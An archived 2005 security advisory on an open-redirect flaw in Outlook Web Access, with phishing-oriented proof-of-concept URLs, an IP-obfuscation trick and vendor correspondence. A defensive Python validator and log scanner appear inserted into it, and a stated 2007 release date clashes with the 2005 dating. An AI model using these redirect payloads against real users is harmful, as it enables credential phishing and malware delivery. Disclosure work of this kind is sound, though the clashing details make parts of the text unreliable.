Exploit Labs Security Advisory 2005.1

2005-02-22T00:00:00
ID PACKETSTORM:36079
Type packetstorm
Reporter Donnie Werner
Modified 2005-02-22T00:00:00

Description

                                        
                                            `------------------------------------------------------------  
- EXPL-A-2005-001 exploitlabs.com Advisory 030 -  
------------------------------------------------------------  
- Microsoft Outlook Web Access -  
  
  
  
OVERVIEW  
========  
A vulnerability in Microsoft Outlook Web Access allows a malicious  
attacker to redirect the login to any URL they wish.  
This lets the attacker send the user to a site of the attacker's  
choosing, which enables social engineering and phishing-style  
attacks.  
  
  
AFFECTED PRODUCTS  
=================  
Microsoft Outlook Web Access ( OWA )  
Windows 2003  
  
  
DETAILS  
=======  
By using a specially crafted URL, an attacker can cause the end user  
to be redirected to an arbitrary URL once the login button is pressed.  
  
  
ATTACK PROFILE  
==============  
An attacker could gather known user email addresses for a company  
that uses OWA and send them a link to the trusted login page with an  
obfuscated redirect appended as an encoded URL, such as  
  
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/  
  
This takes the user to http://example.com when the login button  
is pressed, and because the link points at the trusted login page the  
user is more likely to trust the URL.  
The attacker can then host a page that captures the username and  
password and redirects back to the original login page, or carry out  
some other form of phishing attack ( or other trusted-URL attack ).  
  
  
SOLUTION  
========  
Microsoft was contacted on Jan 20, 2005.  
NO patch has been produced to correct the vulnerability.  
They issued the following response on Jan 21, 2005  
( see VENDOR RESPONSE ).  
This release is dated Jan 25, 2007.  
  
  
PROOF OF CONCEPT  
================  
  
1. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]  
  
2. https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]  
  
then click "login"  
  
  
After the value is injected into the form, the page source reveals...  
  
<BODY scroll="AUTO" bgColor="#3D5FA3" text="#000000" leftMargin=0  
topMargin=0>  
<FORM action="/exchweb/bin/auth/owaauth.dll" method="POST"  
name="logonForm"  
autocomplete="off">  
<INPUT type="hidden" name="destination"  
value="http://[otherhost/file.exe]">  
<INPUT type="hidden" name="flags" value="0">  
<TABLE id="borderTable" class="standardTable" cellSpacing=0  
cellPadding=0  
height="100%" width="100%" bgColor="#3D5FA3" border=0>  
  
note:  
the [otherhost] may easily be obfuscated so as not to alarm the targeted  
user(s), for example  
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/  
( which loads http://example.com )  
  
  
notes:  
Example 1 redirects the user to a URL of the attacker's choosing.  
Example 2 prompts the user to download an executable or other file.  
Either could be used in conjunction with the attack scenario described above.  
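The attack profile and both proof-of-concept items above reduce to one unvalidated parameter: whatever arrives in `url` is copied into the hidden `destination` field of the logon form. The Python below is an added example written for this advisory, not code from Microsoft or from exploitlabs, and it shows the two checks a defender would want: a validator that accepts only same-site destinations (the check an application should apply before echoing `url` back), and a scanner over constructed IIS-style log lines that flags logon requests whose `url` points off-host. The scanner decodes the decimal-IP obfuscation the advisory uses (http://3221234342/ is 192.0.34.166, the address the advisory labels as example.com) so an allow-list or log rule cannot be sidestepped by it. The allowed host `owa.example.internal`, the host `evil.example` and the log lines are constructed placeholders.

```python
"""Defensive checks for open-redirect abuse of an OWA-style logon ``url``
parameter. Added example for this advisory; not Microsoft's or
exploitlabs' code. Host names and log lines are constructed.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

# Hosts this deployment legitimately redirects to (assumed placeholder).
ALLOWED_HOSTS = {"owa.example.internal"}


def canonical_host(netloc_host):
    """Return the host part of a URL in a comparable form.

    Browsers accept a bare 32-bit decimal integer as an IPv4 address, so
    http://3221234342/ loads 192.0.34.166. Decoding that form here means
    the obfuscation cannot slip past an allow-list or a log rule.
    """
    if netloc_host is None:
        return None
    host = netloc_host.lower()
    if host.isdigit() and int(host) <= 0xFFFFFFFF:
        return str(ipaddress.IPv4Address(int(host)))
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        return host  # an ordinary DNS name


def is_safe_redirect(target):
    """True only for destinations that keep the user on this site."""
    if not target:
        return False
    t = target.strip().replace("\\", "/")
    # "//evil" and "/\evil" are scheme-relative and leave the site.
    if t.startswith("//"):
        return False
    parts = urlsplit(t)
    if not parts.scheme and not parts.netloc:
        # A plain site-relative path such as /exchange/ is acceptable.
        return t.startswith("/")
    if parts.scheme not in ("http", "https"):
        return False  # javascript:, data:, etc.
    return canonical_host(parts.hostname) in ALLOWED_HOSTS


# Constructed IIS W3C-style lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2005-02-22 10:01:02 10.0.0.5 GET /exchweb/bin/auth/owalogon.asp url=/exchange/ 200
2005-02-22 10:01:09 10.0.0.7 GET /exchweb/bin/auth/owalogon.asp url=http://3221234342/ 200
2005-02-22 10:01:15 10.0.0.9 GET /exchweb/bin/auth/owalogon.asp url=https%3A%2F%2Fowa.example.internal%2Fexchange 200
2005-02-22 10:01:20 10.0.0.9 GET /exchweb/bin/auth/owalogon.asp url=http%3A%2F%2Fevil.example%2Ffile.exe 200
2005-02-22 10:01:31 10.0.0.4 GET /exchange/ - 200
"""

LOGON_STEM = "/exchweb/bin/auth/owalogon.asp"


def scan_log(text):
    """Return (client_ip, canonical destination host) for every logon
    request whose ``url`` parameter would send the user off-site."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[4].lower() != LOGON_STEM:
            continue
        params = parse_qs(fields[5], keep_blank_values=True)
        for target in params.get("url", []):
            if not is_safe_redirect(target):
                host = canonical_host(urlsplit(target).hostname) or target
                hits.append((fields[2], host))
    return hits


if __name__ == "__main__":
    for client, host in scan_log(SAMPLE_LOG):
        print(f"off-site logon redirect from {client} -> {host}")
```

The validator deliberately treats anything with a scheme or authority as untrusted unless its decoded host is on the allow-list, and it normalises backslashes before the scheme-relative check because browsers treat `/\host` like `//host`. The same `canonical_host` helper is what lets the log scanner report `192.0.34.166` instead of the opaque decimal form.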
  
  
CREDITS  
=======  
This vulnerability was discovered and researched by  
Donnie Werner of exploitlabs.com  
  
Donnie Werner  
se_cur_ity@hotmail.com  
morning_wood@zone-h.org  
--   
Web: http://exploitlabs.com  
http://zone-h.org  
  
  
  
VENDOR RESPONSE  
===============  
  
researcher initial:  
------------------  
Dear Microsoft,  
The following discusses a potential security vulnerability affecting  
one of your products. We are bringing it to your attention in order to  
assist you in investigating it and determining the appropriate actions,  
and have provided preliminary information about the potential  
vulnerability below. Please read our disclosure policy, available at  
http://www.exploitlabs.com/disclosure-policy.html if you have any  
questions.  
Please confirm using the contact information I have provided below that  
you have received this note.  
  
We look forward to working with you,  
  
Exploitlabs Research Team  
  
Donnie Werner  
se_cur_ity@hotmail.com  
  
  
vendor response 1  
-----------------  
Hello Donnie,  
  
Thanks very much for contacting us. We have investigated reports of this  
behavior in the past and plan to fix it in the next major release of  
Exchange. Please let me know if you have further questions.  
  
Thanks,  
Christopher, CISSP  
  
  
researcher initial 2  
--------------------  
Christopher,  
when is the "next major release of Exchange" due?  
I think it may be in the interest of admins to know this  
flaw exists, and to possibly alert their users of potential  
phishing attacks and to help secure their systems.  
Exchange 2003 OWA is used extensively in corporate  
environments, where this flaw will have the most impact  
being this is a moderate remote threat, this researcher  
feels that PUBLIC FULL DISCLOSURE is needed.  
possibly MS would be willing to issue a statement to  
the public regarding this issue at this time.  
  
regards,  
  
Donnie Werner ( no fancy letters )  
  
vendor response 2  
-----------------  
(none)  